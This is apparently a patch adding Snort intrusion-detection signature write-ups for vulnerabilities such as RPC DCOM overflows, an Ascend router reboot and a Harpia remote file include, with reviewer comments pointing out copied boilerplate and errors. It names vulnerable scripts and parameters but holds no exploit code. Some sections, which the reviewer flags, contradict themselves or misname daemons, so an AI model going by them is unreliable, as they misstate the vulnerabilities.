+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
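Review bot: 1997.txt never says which PHP application or script the signature matches, so the Detailed Information section ("Some applications do not perform stringent checks when validating the credentials of a client host") is boilerplate an analyst cannot act on, and "Affected Systems: All systems running PHP applications" is too broad to be useful. Name the targeted script and parameter in the Summary, narrow Affected Systems to the product and versions concerned, and add the advisory or CVE to the empty "Additional References" section. Typo: "running ona web server" should be "on a".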
--- /dev/null
+++ b/doc/signatures/1473.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1473
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
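Review bot: apart from the Sid, the body of 1473.txt is identical to 1472.txt, 840.txt and 1824.txt elsewhere in this patch, and like them it does not identify the CGI script the rule matches. If these SIDs detect different scripts, the Summary and Detailed Information of each should say which one, otherwise a reader has no way to tell the four alerts apart. The same "ona web server" typo appears here, and "Additional References" is empty.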
--- /dev/null
+++ b/doc/signatures/3370.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3370
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
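Review bot: the Attack Scenarios section of 3370.txt contradicts the vulnerability described above it. Detailed Information says the overflow is triggered by "a malformed request to an RPC port" handled by DCOM, but Attack Scenarios says "An attacker may make a request for a file with an overly long filename via a network share", which describes a file-sharing attack rather than an RPC DCOM request; one of the two was pasted from another signature and should be corrected. "Expoit code exists" is a typo for "Exploit". The Corrective Action port list (135, 139 and 445) would be clearer if it said which of those carry RPC and which carry SMB, and "Additional References" should cite the bulletin that "the appropriate vendor supplied patches" refers to.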
--- /dev/null
+++ b/doc/signatures/1472.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1472
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
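Review bot: 1472.txt is a word-for-word copy of 1473.txt (and of 840.txt and 1824.txt) with only the Sid changed, and none of the four says which CGI script or parameter the rule inspects. Either make the documents distinct by naming the script each SID matches in the Summary, or have Detailed Information explain why several SIDs share one description. Also fix "ona web server" and fill in "Additional References".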
--- /dev/null
+++ b/doc/signatures/281.txt
@@ -0,0 +1,73 @@
+Rule:  
+
+--
+Sid:
+281
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of 
+Service (DoS) attack that causes some Ascend routers to reboot.
+
+--
+Impact:
+Denial of Service. Traffic between network segments or between internal 
+and external networks can be disrupted.
+
+--
+Detailed Information:
+Some Ascend routers run configuration software that is able to locate 
+other Ascend routers by broadcasting on UDP port 9 (discard).  This port
+is listened on by the Java Configurator tool.  A packet with a specially
+crafted payload can cause the routers to reboot.
+
+--
+Affected Systems:
+	Lucent Ascend MAX Router 5.0 and previous
+	Lucent Ascend Pipeline Router 6.0 and previous
+	Lucent Ascend Pipeline Router 6.0 and previous
+
+
+--
+Attack Scenarios:
+Ascend routers can be forced to reboot remotely without authorization.  
+Since the offending packet is UDP (which is not connection oriented), 
+the sending address can be easily spoofed.  
+
+--
+Ease of Attack:
+Simple.  An exploit is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+An upgrade is available from the manufacturer.  Filtering traffic to 
+port 9 will also prevent this exploit.  
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS262
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0060
+
+Bugtraq:
+http://www.securityfocus.com/bid/714
+
+--
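Review bot: the Affected Systems list in 281.txt contains a duplicated entry: "Lucent Ascend Pipeline Router 6.0 and previous" appears twice in a row, and the second copy should be dropped (or corrected if it was meant to be a different model line). The Corrective Action "Filtering traffic to port 9 will also prevent this exploit" should say UDP port 9, since Detailed Information states the discovery broadcast and the crafted packet are UDP. The two blank lines after the Affected Systems list are also inconsistent with the single blank line used elsewhere. The filled-in CVE, Bugtraq and arachNIDS references here are the pattern the other files in this patch should follow.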
--- /dev/null
+++ b/doc/signatures/840.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+840
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
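Review bot: 840.txt repeats the generic CGI text of 1472.txt, 1473.txt and 1824.txt with nothing specific to SID 840, so a reader cannot tell what request triggers this alert. The Summary should name the script (and, where applicable, the parameter) the rule matches, Affected Systems should name the product rather than "All systems running CGI applications", and "Additional References" is empty. Same "ona web server" typo as in the other copies.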
--- /dev/null
+++ b/doc/signatures/2533.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2533
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
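Review bot: 2533.txt is vague about the trigger. Detailed Information says only that "SSL requests containing an invalid field" cause the host "to stop handling any further requests", without saying which field or which handshake message the rule inspects, and "various software implementations used on Microsoft operating systems" sits oddly next to the following paragraph, which places the bug in "the Microsoft Secure Sockets Layer (SSL) library". Say which message and field the signature keys on, name the affected services (the library is shared by more than one server), and cite the vendor bulletin in the empty "Additional References" section since Corrective Action depends on it. Typo: "An attcker" in Attack Scenarios.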
--- /dev/null
+++ b/doc/signatures/1414.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+1414
+
+--
+
+Summary:
+This event is generated when an SNMP connection over TCP using the 
+default 'private' community is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+SNMP (Simple Network Management Protocol) v1 uses communities and IP 
+addresses to authenticate communication between the SNMP client and SNMP
+daemon. Many SNMP implementations come pre-configured with 'public' and 
+'private' communities. If these are not disabled, the attacker can 
+gather a great deal of information about the device running the SNMP 
+daemon.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
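Review bot: the Summary of 1414.txt says the rule fires on the default 'private' community, but Affected Systems ("Devices running SNMP daemons with 'public' community enabled") and Attack Scenarios ("having the 'public' community set") mention only 'public'; these should refer to 'private' to match the Summary, or to both as Corrective Action does. "Impact: Information gathering" also understates the case if, as is usual, 'private' is the read-write community: a caller presenting it can change device configuration, not just read it, and Impact and Attack Scenarios should say so.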
--- /dev/null
+++ b/doc/signatures/100000671.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000671
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "preload.php" using a remote file being passed as the 
+"func_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "func_prog" parameter in the "preload.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
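Review bot: in 100000671.txt the last paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") is the generic CGI boilerplate used elsewhere in this patch and does not describe a remote file include; drop it, and change the remaining "CGI application" wording to "PHP application", since preload.php is a PHP script. Affected Systems reads "All systems running CGI applications using Harpia", which is garbled; "Systems running the Harpia application" is what is meant. In the Summary, "may indicate that an exploitation attempt has been attempted" is redundant. Formatting: the "--" separators after the Sid and after Affected Systems lack the blank line the other files use, and the file ends with a stray blank line after the final "--".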
--- /dev/null
+++ b/doc/signatures/651.txt
@@ -0,0 +1,55 @@
+Rule:  
+--
+Sid:
+651
+
+--
+Summary:
+Binary data in the packet matched one kind of byte sequence used as filler in buffer overflow attacks.
+
+--
+Impact:
+It is possible someone was attempting a buffer overflow to gain unauthorized access to one of your servers.
+
+--
+Detailed Information:
+This rule triggers when a binary pattern appears in the packet contents which matches one form of filler-bytes used in buffer overflow attacks. Buffer overflows allow execution of arbitrary code with the privlege level of the affected server process. A very detailed discussion of how basic buffer overflows work can be found in the text of "Smashing the stack for fun and profit" by Aleph One in Phrack #49.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+If the attacker suspects you have a server which is vulnerable to buffer overflow, they will attempt to exploit this vulnerability to gain access.
+
+
+--
+Ease of Attack:
+Tools that use buffer overflows with stealth nop are widely available.
+
+--
+False Positives:
+This byte pattern can naturally occur in almost any binary data, so file downloads, streaming media, etc can cause this to false positive. If this traffic appears to be coming from a web or ftp server outside your network to one of your client machines, it is likely a false alert caused by someone downloading a binary file. If this was directed at a port on one of your machines which is running a server process, you may want to check to see if it has been exploited.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Matt Kettler mkettler@evi-inc.com	Initial Research
+Josh Gray	Edits
+
+-- 
+Additional References:
+http://online.securityfocus.com/library/14
+
+
+--
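Review bot: 651.txt leaves Affected Systems and Corrective Action empty and never says what byte sequence the rule matches, even though Ease of Attack refers to "stealth nop" and the Summary to "one kind of byte sequence used as filler". Name the pattern, or at least the instruction class, in Detailed Information so the False Positives paragraph (the most useful part of this file) can be checked against it; state in Affected Systems that any service receiving the traffic may be the target; and give Corrective Action the triage step already implied by False Positives (check whether the destination port belongs to a listening server process and inspect that host). Typos: "privlege", "unkown". The Contributors lines "Matt Kettler mkettler@evi-inc.com	Initial Research" and "Josh Gray	Edits" use tabs and a bare address where the rest of the patch uses "Name <address>".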
--- /dev/null
+++ b/doc/signatures/3265.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3265
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
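Review bot: 3265.txt is identical to 3370.txt in this patch apart from the Sid, so it inherits the same defect: Attack Scenarios ("a request for a file with an overly long filename via a network share") contradicts Detailed Information, which describes "a malformed request to an RPC port" against DCOM. If SIDs 3265 and 3370 match different RPC interfaces or operations, Detailed Information should say which, otherwise the two alerts are indistinguishable to the reader. Fix "Expoit code exists" and add the vendor bulletin to "Additional References" in both files.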
--- /dev/null
+++ b/doc/signatures/2025.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+2025
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0779
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Bugtraq:
+http://www.securityfocus.com/bid/2763
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
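Review bot: the command and daemon names in 2025.txt are misspelled throughout: the NIS password-change client is yppasswd and the server is rpc.yppasswdd, not "ypasswd" and "rpc.ypasswd" (the CVE-2001-0779 entry linked under Additional References is filed against rpc.yppasswdd). Correct the Summary, Detailed Information, Attack Scenarios and Corrective Action accordingly. "Apply pacthes" is a typo. The Corrective Action "Disable the rpc.ypasswd daemon" needs the caveat that this stops NIS users changing their passwords, so it is a stop-gap until the patch is applied rather than a fix. The Detailed Information claim that compromised hosts "display two instances of inetd running" with "a root shell attached to port 77" describes one particular public exploit; say that these are indicators of that exploit rather than of the vulnerability in general.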
--- /dev/null
+++ b/doc/signatures/100000779.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000779
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Horde" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "show" parameter in the "index.php" script used by the "Horde" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Horde
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Dan Raswami <dan.raswami@sourcefire.com>
+
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
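Review bot: the Impact and Detailed Information sections of 100000779.txt describe a server-side compromise, which is not what a cross site scripting bug gives an attacker. "Possible unauthorized administrative access to the server" and "execute system binaries or malicious code of the attackers choosing" are the remote-file-include boilerplate used elsewhere in this patch; for XSS via the "show" parameter of index.php the impact is script execution in the browser of a user who follows the link (session token theft, actions performed as that user, content injection), which is what the Attack Scenarios line already says. Rewrite Impact and the second Detailed Information paragraph on that basis, replace "All systems running CGI applications using Horde" with the affected Horde versions, cite the Horde advisory under Additional References, and add the missing blank line before the "--" after the Sid.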
--- /dev/null
+++ b/doc/signatures/2758.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2758
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repobject
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
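Review bot: the last paragraph of Detailed Information in 2758.txt is broken mid-sentence: "vulnerability in the procedure create_master_repobject" is followed by a line beginning ". This procedure is included in", so the period is orphaned at the start of the next line. Join it as "a vulnerability in the procedure create_master_repobject. This procedure is included in dbms_repcat." Affected Systems has the product name doubled ("Oracle Oracle9i"). Ease of Attack says "Simple" but the text does not say whether a database session is required to call the procedure; if it is, say so in Attack Scenarios, since that changes how an analyst triages the alert. "Additional References" is empty although Corrective Action points to "the appropriate vendor supplied patch"; cite it.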
--- /dev/null
+++ b/doc/signatures/1824.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1824
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
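Review bot: 1824.txt is the fourth copy in this patch (after 1472.txt, 1473.txt and 840.txt) of the same generic CGI description with only the Sid changed; nothing in it identifies the script or parameter SID 1824 matches. Put the specific target in the Summary and Detailed Information, narrow Affected Systems, fill in Additional References, and fix "ona web server".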
--- /dev/null
+++ b/doc/signatures/1678.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1678
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
